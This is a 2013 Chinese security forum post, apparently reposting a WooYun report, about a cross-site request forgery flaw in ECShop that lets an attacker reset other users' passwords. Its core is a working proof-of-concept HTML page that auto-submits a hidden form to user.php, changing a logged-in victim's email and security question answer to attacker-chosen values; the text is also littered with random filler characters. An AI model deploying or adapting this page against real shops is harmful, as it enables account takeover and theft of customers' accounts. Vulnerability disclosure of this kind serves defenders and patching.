找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1844|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:: L# j6 `8 z8 g: W, J& Q
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现' U2 n3 \  J( L& k

! B7 h9 \& }% C7 R8 v$ l  [Demo For:http://www.wooyun.org/bug.php?action=view&id=395# J$ ?* G. p: V
* U  q8 V3 W. G3 D( E5 C
详细说明:
  ?% f% U$ n- I1 x利用csrf和xss可以突破官方所说的“障碍”
: R! D6 T1 _% R5 G' W& X0 m; E% V; ?xss版本已经有人说明
4 Q. k; ]% v5 A这里给出csrf版本
2 j& h; r/ t% B9 v4 R# u7 b' ^. ^2 R
$ j$ d) n  o( @; O* ^, e漏洞证明:1 a& G5 l5 K- U1 ^3 U& c1 b
<html>
  S1 ]) }# A! g# e( u2 z. r( R& ~<body>
" y0 A" J7 y6 }7 z<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) a3 ?4 d( o( c" I0 ?
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 B1 W" x& x, z. c<INPUT TYPE="text" NAME="act" value="act_edit_profile">. m1 B/ `4 ~6 U* l' [8 M) G: a
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
! y3 `# |. l, m) Z<INPUT TYPE="text" NAME="passwd_answer" value="exploit">6 S8 l/ C8 i) I( }. L& [
</body>
9 Z4 K9 J/ {6 Q7 f+ ]% e<script>7 r( T3 R& u) n8 o
document.forms[0].submit();
* X5 x* N% U  P+ e; y5 Y5 Y</script>
$ f% Q, X$ ~% m8 s. a8 D; U' n% v</html>6 L7 B! y8 ^5 O* s( |$ y
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失$ ], H% ]) t* U8 p2 \$ ^" [

8 P2 {$ h4 V! C& g1 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表